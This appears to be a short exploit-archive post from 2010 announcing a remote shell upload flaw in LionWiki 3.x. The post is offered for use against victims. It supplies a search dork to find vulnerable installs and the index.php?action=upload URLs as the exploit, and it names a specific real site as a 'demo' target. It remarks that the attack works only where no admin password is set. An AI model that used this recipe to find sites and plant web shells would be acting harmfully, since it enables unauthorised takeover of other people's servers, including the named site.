LionWiki version 3.x suffers from a remote shell upload vulnerability.
f09b03df71d79b3faf834eea3270fa62d85ba320d0107e5ca7144ed4a13e3fc8
# Exploit Title: LionWiki 3.X (index.php) upload shell
# Date: monday 05 april 2010
# Author: ayastar
# Software Link: http://lionwiki.0o.cz
# Version: 3.X
# Tested on: ubuntu 9.10 (english )
# CVE : [yes]
# Code : [exploit code]
hi brother's and all muslims
this is my first bug :)
dork : "powered by LionWiki "
exploit :
http://victim/path/index.php?action=upload
http://victim.com/path/?action=upload
demo site :
http://www.wikiphilia.net/lexicon/index.php?action=upload
ah (note)" you can't upload you're shell code if admin create password "
contacte my in
dmx-ayastar@hotmail.fr
cretz for alah and all muslims and all hacker and all tryagian ( ayastar) :)